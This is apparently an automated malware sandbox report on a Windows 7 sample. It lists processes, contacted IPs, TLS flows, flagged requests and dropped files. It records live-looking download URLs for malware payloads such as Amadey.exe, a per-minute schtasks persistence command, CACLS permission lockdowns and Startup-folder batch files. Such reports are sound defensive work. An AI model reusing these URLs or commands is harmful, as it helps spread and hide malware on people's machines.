Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 19, 2023, 7:47 a.m. | Oct. 19, 2023, 7:55 a.m. |
-
-
-
-
-
-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2148 CREDAT:145409
2844
-
-
-
-
-
untilmathematics.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
2788
-
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
2576 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
2736-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2948 -
cacls.exe CACLS "nhdues.exe" /P "test22:N"
2132 -
cacls.exe CACLS "nhdues.exe" /P "test22:R" /E
2532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2752 -
cacls.exe CACLS "..\1ff8bec27e" /P "test22:N"
2928 -
cacls.exe CACLS "..\1ff8bec27e" /P "test22:R" /E
536
-
-
-
-
-
1Dn33rKCA4dC8aXmng0BVypp.exe "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe"
3060
-
-
jsj9BnxQe1wUSt4fq4fFdIbl.exe "C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe"
2640 -
2v4fymhYYNWC2FFg5XXDybVC.exe "C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe"
2696 -
vtmaPKRXAfqpNkKfnPwslgoN.exe "C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe"
2888 -
DhJlbLqN6jQFakonmgEZ33Ks.exe "C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe"
3016 -
tLqJinIq9eTQIYLlq5LobLYm.exe "C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe" --silent --allusers=0
2164
-
-
IP Address | Status | Action |
---|---|---|
104.194.128.170 | Active | Moloch |
104.20.67.143 | Active | Moloch |
104.21.32.208 | Active | Moloch |
104.21.35.235 | Active | Moloch |
104.21.78.56 | Active | Moloch |
107.167.110.211 | Active | Moloch |
117.18.232.200 | Active | Moloch |
121.254.136.9 | Active | Moloch |
131.153.76.130 | Active | Moloch |
148.251.234.93 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.197.174 | Active | Moloch |
172.67.216.81 | Active | Moloch |
172.86.97.117 | Active | Moloch |
193.42.32.29 | Active | Moloch |
194.169.175.127 | Active | Moloch |
45.130.41.101 | Active | Moloch |
69.48.143.183 | Active | Moloch |
85.143.220.63 | Active | Moloch |
85.217.144.143 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49170 104.21.32.208:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=lycheepanel.info | 9f:29:fd:d3:0f:46:b4:fc:1f:d0:06:c7:4e:4d:21:d0:21:08:ea:43 |
TLS 1.2 192.168.56.103:49164 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f |
TLS 1.2 192.168.56.103:49167 172.67.216.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=flyawayaero.net | 34:8b:a3:9d:94:c4:8d:02:5c:e1:f1:43:da:57:49:64:a9:1c:b6:fe |
TLS 1.2 192.168.56.103:49171 172.67.197.174:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.grabyourpizza.com | 19:34:3f:f1:b2:75:20:7f:8a:58:d1:fd:26:b2:74:e2:ea:f8:76:e6 |
TLS 1.2 192.168.56.103:49179 104.21.78.56:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=diplodoka.net | 08:f2:0c:9e:cc:84:cd:91:24:54:d5:fe:5e:3f:a9:46:68:a2:58:33 |
TLS 1.2 192.168.56.103:49176 45.130.41.101:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=laubenstein.space | d4:04:82:56:eb:8d:bb:fd:72:7a:36:fd:90:c1:07:aa:45:ac:92:27 |
TLS 1.2 192.168.56.103:49178 104.21.35.235:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=potatogoose.com | 0f:a9:ea:9d:3e:af:d2:24:68:a0:8f:b7:58:00:c9:0b:f0:7f:31:37 |
TLS 1.2 192.168.56.103:49180 107.167.110.211:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=NO, ST=Oslo, L=Oslo, O=Opera Norway AS, CN=net.geo.opera.com | 8b:1e:84:38:9c:97:8c:be:f7:e1:0e:28:14:15:bb:08:cc:fb:ad:af |
TLS 1.3 192.168.56.103:49232 131.153.76.130:80 |
None | None | None |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://172.86.97.117/himeffectivelyproress.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://85.217.144.143/files/Amadey.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://85.217.144.143/files/My2.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://galandskiyher5.com/downloads/toolspub1.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://gons01b.top/build.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.194.128.170/svp/Ykwrxaauw.dat | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/HPj0MzD6 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://grabyourpizza.com/7a54bdb20779c4359694feaa1398dd25.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe |
request | GET http://172.86.97.117/himeffectivelyproress.exe |
request | GET http://85.217.144.143/files/Amadey.exe |
request | GET http://85.217.144.143/files/My2.exe |
request | GET http://galandskiyher5.com/downloads/toolspub1.exe |
request | GET http://gons01b.top/build.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 |
request | GET http://104.194.128.170/svp/Ykwrxaauw.dat |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://pastebin.com/raw/HPj0MzD6 |
request | GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe |
request | GET https://grabyourpizza.com/7a54bdb20779c4359694feaa1398dd25.exe |
request | GET https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe |
request | GET https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe |
domain | gons01b.top | description | Generic top level domain TLD |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wjix28kKarinpgjAYr9zDmpj.bat |
file | C:\Users\test22\AppData\Local\40VNMGBt49jJ8V6q7umTXrGg.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SaAj8ddbQ8wkYIxlMtU24PeF.bat |
file | C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe |
file | C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esNy7rk0zmYx5Vbij5LA4Nl6.bat |
file | C:\Users\test22\Pictures\Opera_installer_2310190227557342164.dll |
file | C:\Users\test22\AppData\Local\SzrkbvqI3iFiEux3stVgjl0M.exe |
file | C:\Users\test22\AppData\Local\NbPpc3pDAZzoBkBuL7TzDyCB.exe |
file | C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\hime.bat |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\himeffectively.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KkUIGNWOEZ7SF0rQw5yOyBqw.bat |
file | C:\Users\test22\AppData\Local\97bebconSjePqzu2Nd0t5L6F.exe |
file | C:\Users\test22\AppData\Local\Iq88uLPVUOWqnumlAHokPFqD.exe |
file | C:\Users\test22\AppData\Local\c7Faqutu18vIy1LPj9FdgPAf.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ny6g2bRbZ1WF9N4OGUF7Y267.bat |
file | C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe |
file | C:\Users\test22\AppData\Local\Temp\Opera_installer_2310190227556712164.dll |
file | C:\Users\test22\AppData\Local\qFAU3pIQGQ63Dq6IbWwB1ZkI.exe |
file | C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe |
file | C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\seatdesigner.exe |
file | C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe |
file | C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe |
file | C:\Users\test22\AppData\Local\JsmUdKHC65rMj8moaXLLvvsH.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6p1uypRGfTUYYgl5UZ64RlVm.bat |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\untilmathematicspro.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hjWYWkkCY8Nyq0IVvM6rdei6.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKmS6R2JXaTleGwL2IM1fGi1.bat |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\seatdesigner.exe |
file | C:\Users\test22\AppData\Local\SzrkbvqI3iFiEux3stVgjl0M.exe |